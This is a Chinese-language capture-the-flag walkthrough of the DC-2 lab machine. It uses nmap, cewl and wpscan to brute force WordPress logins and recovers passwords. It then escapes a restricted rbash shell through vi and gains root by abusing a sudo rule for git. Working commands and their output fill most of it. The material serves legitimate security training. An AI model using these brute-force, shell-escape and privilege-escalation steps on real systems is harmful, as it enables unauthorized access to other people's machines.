【offensive-security】3.DC-2靶機(jī)

dc-2_1.png

一、獲取靶機(jī)信息

1.已知信息：

• IP: 192.168.245.193

2.獲取信息：

• nmap掃描開啟的服務(wù)

┌──(root?0xlo0p)-[/home/lo0p]
└─# nmap -p "*" -A 192.168.245.194
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-26 19:25 CST
Nmap scan report for dc-2 (192.168.245.194)
Host is up (0.30s latency).
Not shown: 8349 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
|_http-generator: WordPress 4.7.10
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

開了一個80端口事镣，一個7744的ssh端口，先看web冒滩，直接用IP訪問的話訪問不上，會跳到http://dc-2，我們需要修改/etc/hosts文件，修改http://dc-2的本地緩存

修改hosts:

┌──(root?0xlo0p)-[/home/lo0p]
└─# cat /etc/hosts    
127.0.0.1       localhost
192.168.245.194 dc-2

修改完后重啟networking服務(wù)灌曙，/etc/init.d/networking restart

dc-2_2.png

在首頁發(fā)現(xiàn)了第一個flag提示

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

你通常的字典可能行不通，所以推姻，也許你只需要保持冷靜。

更多的密碼總是更好的框沟，但有時你只是不能贏得所有的密碼藏古。

以個人身份登錄以查看下一個標(biāo)志。

如果找不到忍燥，請以其他身份登錄拧晕。

3.爆破WP用戶名及密碼

看樣子是要我們爆破，但是又告訴我們平常的字典沒用梅垄，于是看到關(guān)鍵字cewl厂捞，這個工具可以爬取網(wǎng)站并保存相關(guān)關(guān)鍵字作為字典，使用指南：kali密碼攻擊工具——Cewl使用指南 | 碼農(nóng)網(wǎng) (codercto.com)

┌──(root?0xlo0p)-[/home/lo0p]
└─# cewl http://dc-2/ -w Desktop/wp2.txt      #將爬取到的字典保存到wp2.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

有了密碼字典，還需要知道有哪些用戶名靡馁，上wpscan神器：

┌──(lo0p?0xlo0p)-[~/Desktop]
└─$ wpscan --url http://dc-2 -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ?
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.245.194]
[+] Started: Wed Oct 26 19:39:38 2022

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Oct 26 19:40:07 2022
[+] Requests Done: 58
[+] Cached Requests: 6
[+] Data Sent: 14.614 KB
[+] Data Received: 514.805 KB
[+] Memory used: 207.809 MB
[+] Elapsed time: 00:00:28

用戶名字典也有了欲鹏，我們保存到桌面user.txt上，tom臭墨、jerry赔嚎、admin 一行一個

┌──(lo0p?0xlo0p)-[~/Desktop]
└─$ wpscan --url http://dc-2 -U user.txt -P wp2.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ?
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.245.194]
[+] Started: Wed Oct 26 19:42:16 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.0
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:12 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:12

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing                                                                                                                                                                                                              
[SUCCESS] - tom / parturient                                                                                                                                                                                                                
Trying admin / log Time: 00:03:22 <==============================================================================================                                                                       > (646 / 1121) 57.62%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Oct 26 19:45:55 2022
[+] Requests Done: 788
[+] Cached Requests: 36
[+] Data Sent: 356.206 KB
[+] Data Received: 414.659 KB
[+] Memory used: 252.957 MB
[+] Elapsed time: 00:03:39

拿到了tom和jerry的密碼，我們嘗試登錄后臺胧弛，WEB頁面上沒有登錄入口尤误，我們?nèi)ツ夸洷偏@取：

┌──(root?0xlo0p)-[/home/lo0p]
└─# dirsearch -u http://dc-2/ -e * -x 403 404

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                                                                                            
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                     
                                                                                                                                                                                                                                            
Extensions: | HTTP method: GET | Threads: 30 | Wordlist size: 9009

Output File: /root/.dirsearch/reports/dc-2/-_22-10-26_16-51-46.txt

Error Log: /root/.dirsearch/logs/errors-22-10-26_16-51-46.log

Target: http://dc-2/

[16:51:57] Starting: 
[16:53:10] 301 -    0B  - /index.php  ->  http://dc-2/                      
[16:53:16] 200 -   19KB - /license.txt                                      
[16:53:35] 200 -    7KB - /readme.html                                      
[16:53:49] 301 -  299B  - /wp-admin  ->  http://dc-2/wp-admin/              
[16:53:50] 200 -    0B  - /wp-content/                                      
[16:53:50] 200 -    0B  - /wp-config.php                                    
[16:53:50] 200 -   69B  - /wp-content/plugins/akismet/akismet.php           
[16:53:50] 200 -    1B  - /wp-admin/admin-ajax.php                          
[16:53:50] 302 -    0B  - /wp-admin/  ->  http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1
[16:53:50] 500 -    0B  - /wp-content/plugins/hello.php                     
[16:53:50] 500 -    4KB - /wp-admin/setup-config.php                        
[16:53:50] 200 -    1KB - /wp-admin/install.php
[16:53:50] 301 -  301B  - /wp-content  ->  http://dc-2/wp-content/          
[16:53:50] 500 -    0B  - /wp-includes/rss-functions.php                    
[16:53:50] 200 -    0B  - /wp-cron.php
[16:53:50] 200 -    2KB - /wp-login.php                                     
[16:53:50] 302 -    0B  - /wp-signup.php  ->  http://dc-2/wp-login.php?action=register
[16:53:51] 301 -  302B  - /wp-includes  ->  http://dc-2/wp-includes/        
[16:53:51] 405 -   42B  - /xmlrpc.php                                       
[16:53:53] 200 -   40KB - /wp-includes/                                     
                                                                             
Task Completed

拿到uri: /wp-login.php

我們登錄上后臺结缚，tom用戶沒任何發(fā)現(xiàn)损晤，但是jerry發(fā)現(xiàn)了flag提示：

dc-2_3.png

If you can’t exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

如果你不能利用WordPress并采取快捷方式，還有另一種方法红竭。

希望你找到了另一個切入點(diǎn)尤勋。

這里提示我們WP的exp我們是一個都用不了，經(jīng)msf實驗確實如此德崭，那我們還有什么切入點(diǎn)呢斥黑？回顧開始到現(xiàn)在，好像還有ssh可以利用眉厨，我們可以嘗試ssh爆破锌奴，但是我們可以先試試使用tom和jerry的密碼試試（jerry經(jīng)測試不行，但是可以用tom登錄）：

┌──(lo0p?0xlo0p)-[~]
└─$ ssh tom@192.168.245.194 -p 7744
tom@192.168.245.194's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 26 07:10:05 2022 from 192.168.49.245
tom@DC-2:~$ whoami
-rbash: whoami: command not found

但是只有rbash的權(quán)限憾股，能執(zhí)行的命令限制了很多鹿蜀，這個時候就需要rbash逃逸

4.rbash逃逸

具體原理：(71條消息) 【滲透測試】--- rbash逃逸方法簡述_通地塔的博客-CSDN博客

首先看下能執(zhí)行哪些命令：

tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ echo /home/tom/usr/bin/*
/home/tom/usr/bin/less /home/tom/usr/bin/ls /home/tom/usr/bin/scp /home/tom/usr/bin/vi

根據(jù)上面分享的文章，我們可以利用vi來啟動bash

• vi xxx #進(jìn)入vi界面
• :set shell=/bin/bash
• :shell

啟動到bash以后服球，我們?nèi)匀粺o法執(zhí)行其他命令茴恰，因為PATH環(huán)境變量沒設(shè)置對，設(shè)置如下：

tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin/
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin:/bin/:/usr/bin/
tom@DC-2:~$ whoami
tom

查看tom的home目錄斩熊，我們發(fā)現(xiàn)了flag3提示：

tom@DC-2:~$ ls
flag3.txt  local.txt  usr
tom@DC-2:~$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

看提示往枣，我們需要從tom用戶su到j(luò)erry用戶，密碼和wpscan爆破出來的一樣：

tom@DC-2:~$ su jerry
Password: 
jerry@DC-2:/home/tom$ cd /home/jerry/
jerry@DC-2:~$ ls
flag4.txt  h
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

在jerry的home目錄下發(fā)現(xiàn)了flag4提示粉渠，前面三行說廢話分冈，但是最后一行的git非常顯眼，我們需要嘗試提權(quán)霸株。

5.GIT提權(quán)

1. 查找具有SUID的二進(jìn)制文件(沒找到能用的)

jerry@DC-2:~$ find / -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/at
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/bin/umount
/bin/mount
/bin/su

2. 查看當(dāng)前的權(quán)限

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

看來只能根據(jù)提示使用git提權(quán)雕沉，我們上https://gtfobins.github.io/ 查找git的提權(quán)利用

1.sudo git help config
2.輸入 !/bin/bash

成功拿到root權(quán)限：

root@DC-2:/home/jerry# cd /root
root@DC-2:~# ls
final-flag.txt  proof.txt
root@DC-2:~# cat final-flag.txt 
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

root@DC-2:~# cat proof.txt 
0d359f3e1b67060936ce02bada010328